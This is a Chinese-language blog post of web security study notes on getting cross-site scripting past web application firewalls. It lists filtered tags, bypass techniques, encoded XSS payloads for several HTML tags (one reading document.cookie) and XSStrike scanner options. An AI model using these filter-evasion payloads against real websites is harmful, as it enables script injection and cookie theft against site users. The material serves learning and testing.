网安学习Day20

最新推荐文章于 2024-08-07 21:56:36 发布
最新推荐文章于 2024-08-07 21:56:36 发布
阅读量218 收藏 1
点赞数
文章标签: 学习 安全 web安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/124862382
版权

目录

xss绕过

常规WAF绕过思想

常见WAF过滤的标签

绕过方法

audio标签

video标签

div标签

math标签

button标签

keygen标签

object标签

iframe标签

XSS在线模糊测试平台

xss安全修复方法

xss绕过

常规WAF绕过思想

标签语法替换

特殊符号干扰

垃圾数据溢出

加密解密算法

结合其他漏洞绕过

常见WAF过滤的标签

<script> <a> <img> <p> <body> <button> <var> <div> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <iframe> <object> <input> <audio> <select>

绕过方法

可以弹窗的:alert、prompt、confirm,base64加密,编码绕过(安全狗都没有过滤)

绕过的方法有很多比如:

大小写绕过

javascript伪协议

没有分号

Flash

HTML5新标签

Fuzz模糊测试

双层标签绕过

audio标签

<audio src=x onerror=alert(1)>
<audio src=x onerror=prompt(1);>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>

video标签

<video src=x onerror=prompt(1);>
<video src=x onerror=alert(1)>

div标签

<div style="width:expression(alert(/1/))">1</div>    //IE浏览器执行
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>  //url编码绕过

math标签

<math><a/xlink:href=javascript:prompt(1)>Xss
<math href="javascript:javascript:alert(1)">Xss</math>

button标签

<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >xss</button>

keygen标签

<keygen/onfocus=prompt(1);>
<keygen onfocus=javascript:alert(1) autofocus>

object标签

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==   
      解码:<script>alert(1)</script>

iframe标签

<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>

XSS在线模糊测试平台

 https://xssfuzzer.com/fuzzer.html

自动化XSS工具-xsstrike

-h, --help       //显示帮助信息
-u, --url       //指定目标 URL
--data           //POST 方式提交内容
-v, --verbose   //详细输出
-f, --file       //加载自定义 paload 字典
-t, --threads   //定义线程数
-l, --level     //爬行深度
-t, --encode     //定义 payload 编码方式
--json           //将 POST 数据视为 JSON
--path           //测试 URL 路径组件
--seeds         //从文件中测试、抓取 URL
--fuzzer         //测试过滤器和 Web 应用程序防火墙。
--update         //更新
--timeout       //设置超时时间
--params         //指定参数
--crawl         //爬行
--proxy         //使用代理
--blind         //盲测试
--skip           //跳过确认提示
--skip-dom       //跳过 DOM 扫描
--headers       //提供 HTTP 标头
-d, --delay     //设置延迟

xss安全修复方法

开启 httponly,输入过滤,输出过滤等
PHP:http://www.zuimoge.com/212.html
JAVA:https://www.cnblogs.com/baixiansheng/p/9001522.html

本文章参考于XSS跨站之WAF绕过

Y4y17
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
学习JavaEE的day20
03-04
在“学习JavaEE的day20”这个主题中,我们主要关注的是Java企业版(JavaEE)的进阶学习。JavaEE是Java平台的一个版本,它为开发分布式、多层的企业级应用程序提供了丰富的框架和API。这个阶段的学习通常涵盖了更复杂...
黑马机器学习day01
08-08
黑马机器学习day01
网安学习day2
star_moon_myth的博客
04-28 791
今早实验课发现两个有意思的头歌python题目:第1关:个人信息提取用户输入自己的个人信息,格式如下:0122923450321 王昊 法学1801 河北 2001年数据分别表示:学号 姓名 专业班级 籍贯 出生年份,各数据间空格间隔有些用户没有按照规则输入数据,输入自己出生年份的时候写成了类似‘1900年生’或‘出生于1985’或‘19岁生于2006年11月’的数据格式。请注意程序此时仍然需要正确读取该项数据,。
网安学习DAY8(24
2401_84297796的博客
04-27 886
Message:(1) 输入(2) 输入显示在下方,点击文字可实现跳转到百度页面。
网安学习day1
star_moon_myth的博客
04-26 265
初中老师语文老师对我以后的人生发展历程影响极大,我一直铭记着他的一句话:“当你感到焦虑、迷茫的时候,对生活毫无目标的时候,抛下这一切念头,尽管去学习,做自己手头上的事,做当前的事,终有一天,当你回头看时,自己的迷茫、焦虑早已被自己的努力锁所掩埋。网络安全又名网络空间安全(赛博安全),是一个广义的名称,包含的内容很多,并且也在不断地进行扩充,目前来看主要是分为信息系统安全、技术安全、信息系统生命周期。(暂时先到这儿,累了乏了,明儿还有早八!Nday:已经发布的官方补丁的漏洞,并且时间已经过去了很久。
网安学习Day19
weixin_44770698的博客
05-16 430
XSS入门学习与对应的练习
网安学习Day13
weixin_44770698的博客
05-04 845
文件上传之黑白名单绕过 文件上传常见的验证方式 后缀名、类型、文件头等 后缀名:黑名单、白名单 文件类型:MIME信息 文件头:内容头信息 其中后缀名的验证方式就是验证文件的后缀是否是允许上传的文件的后缀,后缀名验证方式又分为黑名单和白名单的方式;其中的黑名单指的就是规定不允许上传的文件的格式(如规定不允许上传.asp、.jsp、.aspx、.php、.cgi、.war等等);而白名单是指明确可以上传的格式后缀(如.jpg、.png、.zip、.rar、.gif);显然白名单的方式是更加安全一些
网安学习Day14
weixin_44770698的博客
05-06 118
目录 upload_labs通过 level-12 level-13 level-14 level-15 level-16 level-17​ ​level-18 level-19​ level-20​ level-21​ 今天继续通过uploadlabs来联系文件上传的知识点,上次做到了第11关,接下来就更新剩下的所有的关卡。 upload_labs通过 level-12 显然这里是白名单的方式来设置的规则,但是上传的路径是可以进行控制的,这里通过G...
网安学习Day12
weixin_44770698的博客
05-02 962
初识文件上传漏洞 那么什么是文件上传漏洞呢? 文件上传是web开发中的一项基本的功能,是指将本地的文档、视频、音频以及图片等上传到服务器,从而使得自己或者是其他的用户下载或者浏览的过程。 那么文件上传漏洞是指程序员在WEB应用中利用客户端上传功能控制、检测、处理的不足,向服务器上传特定的可执行文件(如webshell、恶意脚本、木马等)以达到控制主机的目的。 文件上传漏洞的危害 web开发人员如果在实现文件上传功能的时候,没有对文件的格式、后缀进行严格的过滤和检验,那么攻击者便可以利用这一方面的缺
网安学习日记 day1
weixin_73955092的博客
07-14 258
js文件可能会泄露有效信息,更多的js文件可以有更多的机会查找有效信息,因此需要先获取。2. 403可以加#路由和../../绕过 404 使用..;/绕过 nginx。403可以加#路由和../../绕过 404 使用..;
网安学习Day9
weixin_44770698的博客
04-24 2236
今天学习了sql server的注入,这里还是以墨者学院的在线靶场做演示。当我们拿到一个网址的时候,首先就是判断是否存在注入,其方法与mysql注入的方式时相同的: http://219.153.49.228:47167/?id=2 and 1=1(正常回显) http://219.153.49.228:47167/?id=2 and 1=2 #(不正常回显) 得知id存在注入 http://219.153.49.228:47167/?id=2 order by 4 #(正常回显)判断字段数
小白的20天Java学习打卡day1
12-22
【小白的20天Java学习打卡day1】 学习Java编程的第一步通常是理解基本概念,包括软件的本质、操作系统、编程语言的作用以及如何在Windows系统中进行基础操作。在本篇学习笔记中,我们将探讨这些关键点。 1. **什么...
React的学习Day5
01-20
Day5 yarn 和npm 命令对比表格 命令对比表 https://yarn.bootcss.com/docs/migrating-from-npm/ 脚手架自带的服务器是webpack-dev-server 启动命令 npm start 当npm遇到start可以省略run 端口的修改(默认端口3000) ...
小白的20天Java学习打卡day2
12-22
太原理工大学机器人团队20天学习打卡day2 学习内容:Java 学习网站:b站 day02 今天的内容比昨天多很多,也更难理解,希望能坚持下去 1、打开DOS命令窗口,执行java HelloWorld,执行原理 java.exe命令会启动JVM JVM...
【Sklearn学习】Sklearn的数据集介绍
最新发布
一条咸鱼
08-07 395
sklearn数据集的介绍,方便后面学习使用的对应的数据集。
【OpenCV C++20 学习笔记】阈值操作—分离图片对象
TeamLee的博客
08-04 966
简单介绍了OpenCV中二值化、反二值化等阈值操作的原理和代码实现。
日常学习--20240806
xxm13679073037的博客
08-07 543
调优
Zero123++ 论文学习
calvinpaean的博客
08-07 766
随着新视图生成模型的涌现,3D 内容生成领域取得了显著进展,这些模型利用了强大的 2D 扩散生成先验知识,这些 2D 扩散模型是在互联网上的大规模数据集训练得到的。如果没有全局条件,针对可见区域生成的内容还是不错的,但是对于不可见区域,则生成质量就急剧下降了,因为模型缺乏推理物体的全局语义的能力。Reference Attention 指的就是,在对模型的输入去噪时,对一个额外的参考图像使用去噪 UNet 模型,并将参考图像中得到的自注意力 key 矩阵和 value 矩阵附加到去噪模型的相应的注意力层。
利用机器学习挖掘0day
04-14
很抱歉,我不能提供关于利用机器学习挖掘0day的信息。0day漏洞是指尚未被公开发现或修复的安全漏洞,利用这些漏洞可能会对系统造成严重的安全威胁。挖掘0day漏洞需要深入的安全知识和专业技能,并且需要遵守法律和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值